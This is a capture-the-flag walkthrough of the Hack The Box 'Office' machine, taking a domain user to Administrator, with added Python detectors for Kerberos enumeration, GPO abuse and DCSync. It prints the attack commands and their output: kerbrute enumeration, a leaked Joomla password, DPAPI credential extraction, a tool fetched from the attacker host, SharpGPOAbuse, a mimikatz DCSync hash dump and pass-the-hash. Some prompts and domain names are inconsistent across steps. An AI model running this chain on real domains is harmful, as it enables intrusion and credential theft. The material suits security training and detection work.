htb-office


For the first part (the foothold), see:

HTB: Office | 0xdf hacks stuff


Use kerbrute in userenum mode to check which names from the wordlist are valid domain users:

$ kerbrute userenum --dc 10.10.11.3 -d office.htb /opt/SecLists/Usernames/xato-net-10-million-usernames-dup.txt 
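Added defender-side example (not from these notes or from kerbrute): a wordlist sweep like the one above shows up in the domain controller's Security log as a burst of Event ID 4768 (Kerberos TGT requested) entries from a single client with Result Code 0x6 (KDC_ERR_C_PRINCIPAL_UNKNOWN), while the names that come back 0x19 (KDC_ERR_PREAUTH_REQUIRED) are the accounts the sweep confirmed. The events here are constructed dicts standing in for rows pulled from the EVTX or a SIEM; the window and threshold are assumptions to tune per environment.

```python
# Added example, not part of the original notes or of kerbrute itself.
# Flags a client that generates many 4768 events with status 0x6 (unknown
# principal) inside a short window and lists which accounts the same client
# confirmed as existing (status 0x19).
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample: one client sweeping a wordlist, one client with a single typo.
SAMPLE_EVENTS = [
    {"ts": "2024-01-18T11:50:00", "ip": "10.10.14.5",  "account": "aaron",  "status": "0x6"},
    {"ts": "2024-01-18T11:50:00", "ip": "10.10.14.5",  "account": "abby",   "status": "0x6"},
    {"ts": "2024-01-18T11:50:01", "ip": "10.10.14.5",  "account": "admin",  "status": "0x6"},
    {"ts": "2024-01-18T11:50:01", "ip": "10.10.14.5",  "account": "ppotts", "status": "0x19"},
    {"ts": "2024-01-18T11:50:02", "ip": "10.10.14.5",  "account": "adam",   "status": "0x6"},
    {"ts": "2024-01-18T11:50:02", "ip": "10.10.14.5",  "account": "alex",   "status": "0x6"},
    {"ts": "2024-01-18T11:50:03", "ip": "10.10.14.5",  "account": "hhogan", "status": "0x19"},
    {"ts": "2024-01-18T11:50:03", "ip": "10.10.14.5",  "account": "alice",  "status": "0x6"},
    {"ts": "2024-01-18T11:55:00", "ip": "10.10.11.50", "account": "jdoe",   "status": "0x6"},
]


def detect_user_enum(events, window=timedelta(seconds=60), threshold=5):
    """Return {client_ip: {...}} for every client whose unknown-principal
    failures (status 0x6) reach `threshold` inside any `window`-long span."""
    by_ip = defaultdict(list)
    for e in events:
        if e.get("event_id", 4768) == 4768:
            by_ip[e["ip"]].append(e)

    alerts = {}
    for ip, evs in by_ip.items():
        unknown = sorted(datetime.fromisoformat(e["ts"])
                         for e in evs if e["status"] == "0x6")
        # Sliding window: the largest number of 0x6 results inside `window`.
        best = start = 0
        for end, ts in enumerate(unknown):
            while ts - unknown[start] > window:
                start += 1
            best = max(best, end - start + 1)
        if best >= threshold:
            # Accounts the sweep confirmed: same client, pre-auth required.
            confirmed = sorted({e["account"] for e in evs if e["status"] == "0x19"})
            alerts[ip] = {"unknown_in_window": best, "confirmed_accounts": confirmed}
    return alerts


if __name__ == "__main__":
    for ip, info in detect_user_enum(SAMPLE_EVENTS).items():
        print(f"[!] {ip}: {info['unknown_in_window']} unknown principals within 60s; "
              f"confirmed accounts: {', '.join(info['confirmed_accounts']) or 'none'}")
```

The single failure from 10.10.11.50 stays below the threshold, so an ordinary typo does not alert; the listed confirmed accounts are the ones worth watching for follow-on password spraying.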

c:\PENTEST\HTB\OFFICE>curl http://office.htb/api/index.php/v1/config/application?public=true
{"links":{"--snip--id":"224","attributes":{"password":"H0lOgrams4reTakIng0Ver754!","id":224}},{"type":"application","id":"224","attributes":{"db":"joomla_db","id":224}},{"type":"application","id":"224","attributes":{"dbprefix":"if2tx_","id":224}},{"type":"application","id":"224","attributes":{"dbencryption":0,"id":224}},{"type":"application","id":"224","attributes":{"dbsslverifyservercert":false,"id":224}}],"meta":{"total-pages":4}}
c:\PENTEST\HTB\OFFICE>

So the exposed Joomla application config gives us a password: H0lOgrams4reTakIng0Ver754!

Shell as HHogan

Enumeration

cmdkey /list will show if there are any saved credentials on the current account:

PS C:\Users\PPotts> cmdkey /list

Currently stored credentials:

    Target: LegacyGeneric:target=MyTarget
    Type: Generic 
    User: MyUser
    
    Target: Domain:interactive=office\hhogan
    Type: Domain Password
    User: office\hhogan

The one for HHogan is certainly of interest. They are in the Remote Management Users group, which means if I can recover this credential I can likely connect over WinRM:

Tip: It’s worth mentioning that the latest version of the tool SharpDPAPI is capable of extracting credentials protected by DPAPI.

Upload SharpDPAPI.exe and run it in credentials mode with /rpc, so that the domain controller decrypts the DPAPI master keys for us:


c:\windows\tasks\SharpDPAPI.exe credentials /rpc

  __                 _   _       _ ___ 
 (_  |_   _. ._ ._  | \ |_) /\  |_) |  
 __) | | (_| |  |_) |_/ |  /--\ |  _|_ 
                |                      
  v1.12.0                               


[*] Action: User DPAPI Credential Triage

[*] Will ask a domain controller to decrypt masterkeys for us

[*] Found MasterKey : C:\Users\PPotts\AppData\Roaming\Microsoft\Protect\S-1-5-21-1199398058-4196589450-691661856-1107\10811601-0fa9-43c2-97e5-9bef8471fc7d
[*] Found MasterKey : C:\Users\PPotts\AppData\Roaming\Microsoft\Protect\S-1-5-21-1199398058-4196589450-691661856-1107\191d3f9d-7959-4b4d-a520-a444853c47eb
[*] Found MasterKey : C:\Users\PPotts\AppData\Roaming\Microsoft\Protect\S-1-5-21-1199398058-4196589450-691661856-1107\fb2eb8a9-12f7-4f07-83ee-d2cd6aae71c0

[*] Preferred master keys:

C:\Users\PPotts\AppData\Roaming\Microsoft\Protect\S-1-5-21-1199398058-4196589450-691661856-1107:fb2eb8a9-12f7-4f07-83ee-d2cd6aae71c0

[*] User master key cache:

{10811601-0fa9-43c2-97e5-9bef8471fc7d}:FBAB11CACDD8407E8DB9604F0F8C92178BEE6FD3
{191d3f9d-7959-4b4d-a520-a444853c47eb}:85285EB368BEFB1670633B05CE58CA4D75C73C77
{fb2eb8a9-12f7-4f07-83ee-d2cd6aae71c0}:33DB2B821336CD6E93872AD397CB6960F1E9EEBA


[*] Triaging Credentials for current user


Folder       : C:\Users\PPotts\AppData\Roaming\Microsoft\Credentials\

  CredFile           : 18A1927A997A794B65E9849883AC3F3E

    guidMasterKey    : {191d3f9d-7959-4b4d-a520-a444853c47eb}
    size             : 358
    flags            : 0x20000000 (CRYPTPROTECT_SYSTEM)
    algHash/algCrypt : 32772 (CALG_SHA) / 26115 (CALG_3DES)
    description      : Enterprise Credential Data

    LastWritten      : 5/9/2023 2:08:54 PM
    TargetName       : LegacyGeneric:target=MyTarget
    TargetAlias      : 
    Comment          : 
    UserName         : MyUser
    Credential       : 

  CredFile           : 84F1CAEEBF466550F4967858F9353FB4

    guidMasterKey    : {191d3f9d-7959-4b4d-a520-a444853c47eb}
    size             : 398
    flags            : 0x20000000 (CRYPTPROTECT_SYSTEM)
    algHash/algCrypt : 32772 (CALG_SHA) / 26115 (CALG_3DES)
    description      : Enterprise Credential Data

    LastWritten      : 5/9/2023 4:03:21 PM
    TargetName       : Domain:interactive=OFFICE\HHogan
    TargetAlias      : 
    Comment          : 
    UserName         : OFFICE\HHogan
    Credential       : H4ppyFtW183#

  CredFile           : E76CCA3670CD9BB98DF79E0A8D176F1E

    guidMasterKey    : {10811601-0fa9-43c2-97e5-9bef8471fc7d}
    size             : 374
    flags            : 0x20000000 (CRYPTPROTECT_SYSTEM)
    algHash/algCrypt : 32772 (CALG_SHA) / 26115 (CALG_3DES)
    description      : Enterprise Credential Data

    LastWritten      : 1/18/2024 11:53:30 AM
    TargetName       : Domain:interactive=office\hhogan
    TargetAlias      : 
    Comment          : 
    UserName         : office\hhogan
    Credential       : 



SharpDPAPI completed in 00:00:00.2319211


WinRM

Validate

The creds are good for SMB and WinRM:

oxdf@hacky$ netexec smb office.htb -u hhogan -p 'H4ppyFtW183#'
SMB         10.10.11.3      445    DC               [*] Windows Server 2022 Build 20348 (name:DC) (domain:office.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.3      445    DC               [+] office.htb\hhogan:H4ppyFtW183# 
oxdf@hacky$ netexec winrm office.htb -u hhogan -p 'H4ppyFtW183#'
WINRM       10.10.11.3      5985   DC               [*] Windows Server 2022 Build 20348 (name:DC) (domain:office.htb)
WINRM       10.10.11.3      5985   DC               [+] office.htb\hhogan:H4ppyFtW183# (Pwn3d!)

Shell

I’ll use Evil-WinRM to get a shell:

C:\Python\Scripts>evil-winrm-py.exe -i office.htb -u hhogan -p H4ppyFtW183#
          _ _            _
  _____ _(_| |_____ __ _(_)_ _  _ _ _ __ ___ _ __ _  _
 / -_\ V | | |___\ V  V | | ' \| '_| '  |___| '_ | || |
 \___|\_/|_|_|    \_/\_/|_|_||_|_| |_|_|_|  | .__/\_, |
                                            |_|   |__/  v1.4.1

[*] Connecting to 'office.htb:5985' as 'hhogan'
evil-winrm-py PS C:\Users\HHogan\Documents>

PS C:\PENTEST> $pass = ConvertTo-SecureString "H4ppyFtW183#" -AsPlainText -Force
PS C:\PENTEST> $cred = New-Object System.Management.Automation.PSCredential("SUPPORT\hhogan", $pass)
PS C:\PENTEST> Enter-PSSession -ComputerName office.htb -Credential $cred
[office.htb]: PS C:\Users\HHogan\Documents>


Administrator Access

Enumeration

HHogan is a member of the “GPO Managers” group:

[office.htb]: PS C:\Users\HHogan\Documents> whoami /groups

GROUP INFORMATION
-----------------

Group Name                                  Type             SID                                           Attributes       
=========================================== ================ ============================================= ==================================================
Everyone                                    Well-known group S-1-1-0                                       Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users             Alias            S-1-5-32-580                                  Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                               Alias            S-1-5-32-545                                  Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access  Alias            S-1-5-32-554                                  Mandatory group, Enabled by default, Enabled group
BUILTIN\Certificate Service DCOM Access     Alias            S-1-5-32-574                                  Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK                        Well-known group S-1-5-2                                       Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users            Well-known group S-1-5-11                                      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization              Well-known group S-1-5-15                                      Mandatory group, Enabled by default, Enabled group
OFFICE\GPO Managers                         Group            S-1-5-21-1199398058-4196589450-691661856-1117 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication            Well-known group S-1-5-64-10                                   Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Plus Mandatory Level Label            S-1-16-8448                                                    
[office.htb]: PS C:\Users\HHogan\Documents>

There are a handful of GPOs here:

[office.htb]: PS C:\programdata> Get-GPO -All | Select-Object DisplayName

DisplayName
-----------
Windows Firewall GPO
Default Domain Policy
Default Active Directory Settings GPO
Default Domain Controllers Policy
Windows Update GPO
Windows Update Domain Policy
Software Installation GPO
Password Policy GPO

GPO Abuse

I’ll assume membership in that group means HHogan can edit GPOs. GPOs (Group Policy Objects) are the policies Active Directory uses to manage computers at scale; they can control almost any setting on a Windows computer.

There’s a really nice tool from FSecureLabs called SharpGPOAbuse designed to abuse GPOs. It offers the following:

 

I’ll host a copy on my Python webserver and upload it:

*Evil-WinRM* PS C:\programdata> wget 10.10.14.5/SharpGPOAbuse.exe -outfile SharpGPOAbuse.exe

The first GPO isn’t writable:

[office.htb]: PS C:\programdata> .\SharpGPOAbuse.exe --AddLocalADmin --UserAccount HHogan --GPOName "Windows Firewall GPO"
[+] Domain = office.htb
[+] Domain Controller = DC.office.htb
[+] Distinguished Name = CN=Policies,CN=System,DC=office,DC=htb
[+] SID Value of HHogan = S-1-5-21-1199398058-4196589450-691661856-1108
[+] GUID of "Windows Firewall GPO" is: {04FE5C75-0078-4D44-97C5-8A796BE906EC}
Access to the path '\\office.htb\SysVol\office.htb\Policies\{04FE5C75-0078-4D44-97C5-8A796BE906EC}\Machine\Microsoft\Windows NT\SecEdit\' is denied.[!] Exiting...

But the second one I try works:

[office.htb]: PS C:\programdata> .\SharpGPOAbuse.exe --AddLocalADmin --UserAccount HHogan --GPOName "Default Domain Policy"
[+] Domain = office.htb
[+] Domain Controller = DC.office.htb
[+] Distinguished Name = CN=Policies,CN=System,DC=office,DC=htb
[+] SID Value of HHogan = S-1-5-21-1199398058-4196589450-691661856-1108
[+] GUID of "Default Domain Policy" is: {31B2F340-016D-11D2-945F-00C04FB984F9}
[+] File exists: \\office.htb\SysVol\office.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\Machine\Microsoft\Windows NT\SecEdit\GptTmpl.inf
[+] The GPO does not specify any group memberships.
[+] versionNumber attribute changed successfully
[+] The version number in GPT.ini was increased successfully.
[+] The GPO was modified to include a new local admin. Wait for the GPO refresh cycle.
[+] Done!
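Added defender-side example (not from these notes or from SharpGPOAbuse): the output above shows the change landing in the policy's GptTmpl.inf under SYSVOL and bumping the version in GPT.ini. A local admin forced through a GPO lives in the Restricted Groups section of that file, so a scheduled audit of every policy folder in SYSVOL can catch it. The file contents below are constructed inline to match the observed change (HHogan's SID is the one SharpGPOAbuse printed); on a DC they would be read from the policy folder, where GptTmpl.inf is UTF-16 encoded. The privileged-group table and the allow-list are assumptions to adapt.

```python
# Added example, not part of the original notes or of SharpGPOAbuse.
# Parses a GPO's Machine\Microsoft\Windows NT\SecEdit\GptTmpl.inf and GPT.ini
# and reports any principal the policy forces into a privileged group.
PRIVILEGED_GROUPS = {
    "S-1-5-32-544": "BUILTIN\\Administrators",
    "S-1-5-32-580": "BUILTIN\\Remote Management Users",
}
# Domain-relative RIDs of privileged groups, matched on the SID suffix.
PRIVILEGED_RIDS = {"512": "Domain Admins", "518": "Schema Admins", "519": "Enterprise Admins"}

# Constructed sample of the Restricted Groups entry such an edit produces.
SAMPLE_GPTTMPL = """[Unicode]
Unicode=yes
[Version]
signature="$CHICAGO$"
Revision=1
[Group Membership]
*S-1-5-32-544__Memberof =
*S-1-5-32-544__Members = *S-1-5-21-1199398058-4196589450-691661856-1108
"""
# Constructed GPT.ini: the version is a 32-bit value, user edits in the high
# 16 bits and computer edits in the low 16 bits.
SAMPLE_GPT_INI = """[General]
Version=65539
"""


def parse_inf(text):
    """Minimal INI reader: {section: [(key, value), ...]} keeping key case and order.
    For a real file use open(path, encoding="utf-16").read()."""
    sections, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            sections.setdefault(current, [])
        elif current is not None and "=" in line:
            key, _, value = line.partition("=")
            sections[current].append((key.strip(), value.strip()))
    return sections


def privileged_name(group):
    """Map a group SID from a Restricted Groups key to a display name, or None."""
    if group in PRIVILEGED_GROUPS:
        return PRIVILEGED_GROUPS[group]
    rid = group.rsplit("-", 1)[-1]
    if group.startswith("S-1-5-21-") and rid in PRIVILEGED_RIDS:
        return PRIVILEGED_RIDS[rid]
    return None


def find_privileged_members(inf_text, allowed=frozenset()):
    """Return [(group_name, principal)] for every principal the GPO forces into
    a privileged group via Restricted Groups, minus an allow-list of expected SIDs."""
    findings = []
    for key, value in parse_inf(inf_text).get("Group Membership", []):
        if not key.endswith("__Members"):
            continue
        group = key[: -len("__Members")].lstrip("*")
        name = privileged_name(group)
        if name is None:
            continue
        for member in value.split(","):
            member = member.strip().lstrip("*")
            if member and member not in allowed:
                findings.append((name, member))
    return findings


def gpt_version(ini_text):
    """Return (user_version, computer_version) from GPT.ini, or None if absent.
    A jump in the computer half between audits means the machine side was edited."""
    for key, value in parse_inf(ini_text).get("General", []):
        if key.lower() == "version":
            v = int(value)
            return v >> 16, v & 0xFFFF
    return None


if __name__ == "__main__":
    print("GPT.ini version (user, computer):", gpt_version(SAMPLE_GPT_INI))
    for group, principal in find_privileged_members(SAMPLE_GPTTMPL):
        print(f"[!] {principal} is forced into {group}")
```

Comparing the computer-side version against the value recorded at the previous audit, together with the SYSVOL file write itself, pinpoints which policy changed and when; the principal list then says who was added.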

This doesn’t take effect until the GPO refreshes. HHogan has permission to run gpupdate /force, which triggers the refresh immediately:

*Evil-WinRM* PS C:\programdata> gpupdate /force
Updating policy...

Computer Policy update has completed successfully.

User Policy update has completed successfully.

Now HHogan is in the local Administrators group:

*Evil-WinRM* PS C:\programdata> net user hhogan
User name                    HHogan
Full Name
Comment
User's comment
Country/region code          000 (System Default)
Account active               Yes
Account expires              Never

Password last set            5/6/2023 11:59:34 AM
Password expires             Never
Password changeable          5/7/2023 11:59:34 AM
Password required            Yes
User may change password     Yes

Workstations allowed         All
Logon script
User profile
Home directory
Last logon                   5/10/2023 5:30:58 AM

Logon hours allowed          All

Local Group Memberships      *Administrators       *Remote Management Use
Global Group memberships     *Domain Users         *GPO Managers
The command completed successfully.

It won’t show in my current session, but on exiting and reconnecting:

oxdf@hacky$ evil-winrm -i office.htb -u hhogan -p 'H4ppyFtW183#'

Evil-WinRM shell v3.4

Info: Establishing connection to remote endpoint

[office.htb]: PS C:\Users\HHogan\Documents> net localgroup "Remote Management Users" /add ppotts
The command completed successfully.

And I can read root.txt:

*Evil-WinRM* PS C:\Users\administrator\desktop> type root.txt
f763e698************************

mimikatz # lsadump::dcsync /domain:OFFICE.HTB /user:OFFICE\Administrator
[DC] 'OFFICE.HTB' will be the domain
[DC] 'DC.office.htb' will be the DC server
[DC] 'OFFICE\Administrator' will be the user account
[rpc] Service  : ldap
[rpc] AuthnSvc : GSS_NEGOTIATE (9)

Object RDN           : Administrator

** SAM ACCOUNT **

SAM Username         : Administrator
Account Type         : 30000000 ( USER_OBJECT )
User Account Control : 00110200 ( NORMAL_ACCOUNT DONT_EXPIRE_PASSWD NOT_DELEGATED )
Account expiration   :
Password last change : 5/10/2023 12:00:50 PM
Object Security ID   : S-1-5-21-1199398058-4196589450-691661856-500
Object Relative ID   : 500

Credentials:
  Hash NTLM: f5b4f1e96c7ffca801ed5832e5e9105d
    ntlm- 0: f5b4f1e96c7ffca801ed5832e5e9105d
    ntlm- 1: 70f38a92fcf07435790f06b81235478c
    lm  - 0: 54557a02c3b1e10476d1c894dfffcd1c
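Added defender-side example (not from these notes or from mimikatz): the dcsync above is a directory replication request, so on a domain controller with the Directory Service Access audit subcategory enabled it is recorded as Event ID 4662 whose Properties field carries the replication control-access right GUIDs. Only domain controllers, and a known replication service account if one exists, should ever exercise those rights. The events below are constructed dicts; the DC account and allow-list are assumptions for the sample domain.

```python
# Added example, not part of the original notes or of mimikatz.
# Matches 4662 events against the three replication rights and reports any
# subject that is not an expected replication principal.
import re

REPLICATION_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}
GUID_RE = re.compile(r"[0-9a-fA-F]{8}(?:-[0-9a-fA-F]{4}){3}-[0-9a-fA-F]{12}")

# Constructed sample events (fields as they would be parsed from the EVTX).
SAMPLE_EVENTS = [
    # A peer DC replicating: expected, suppressed.
    {"event_id": 4662, "ts": "2024-01-18T12:00:01", "subject": "OFFICE\\DC$",
     "access_mask": "0x100",
     "properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    # A user account pulling every attribute of every object: alert, even for a Domain Admin.
    {"event_id": 4662, "ts": "2024-01-18T12:00:07", "subject": "OFFICE\\Administrator",
     "access_mask": "0x100",
     "properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    # An ordinary 4662 on an unrelated attribute: ignored.
    {"event_id": 4662, "ts": "2024-01-18T12:00:09", "subject": "OFFICE\\ppotts",
     "access_mask": "0x10",
     "properties": "{bf967aba-0de6-11d0-a285-00aa003049e2}"},
    # Not a 4662 at all: ignored.
    {"event_id": 4624, "ts": "2024-01-18T12:00:10", "subject": "OFFICE\\hhogan",
     "properties": ""},
]


def detect_dcsync(events, dc_accounts, allowed=frozenset()):
    """Return one alert per 4662 event that requests replication rights from a
    subject that is neither a domain controller account nor on the allow-list."""
    expected = {a.lower() for a in dc_accounts} | {a.lower() for a in allowed}
    alerts = []
    for e in events:
        if e.get("event_id") != 4662:
            continue
        guids = {g.lower() for g in GUID_RE.findall(e.get("properties", ""))}
        rights = sorted(REPLICATION_RIGHTS[g] for g in guids & REPLICATION_RIGHTS.keys())
        if not rights or e["subject"].lower() in expected:
            continue
        alerts.append({"ts": e["ts"], "subject": e["subject"], "rights": rights})
    return alerts


if __name__ == "__main__":
    for a in detect_dcsync(SAMPLE_EVENTS, dc_accounts={"OFFICE\\DC$"}):
        print(f"[!] {a['ts']} {a['subject']} requested {', '.join(a['rights'])}")
```

Pairing the alert with the source address from the matching 4624 logon for that session tells you whether the request came from a DC or from a workstation, which is what separates legitimate replication from credential theft.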


C:\Python\Scripts>evil-winrm-py.exe -i office.htb -u Administrator -H f5b4f1e96c7ffca801ed5832e5e9105d
          _ _            _
  _____ _(_| |_____ __ _(_)_ _  _ _ _ __ ___ _ __ _  _
 / -_\ V | | |___\ V  V | | ' \| '_| '  |___| '_ | || |
 \___|\_/|_|_|    \_/\_/|_|_||_|_| |_|_|_|  | .__/\_, |
                                            |_|   |__/  v1.4.1

[*] Connecting to 'office.htb:5985' as 'Administrator'
evil-winrm-py PS C:\Users\Administrator\Documents>
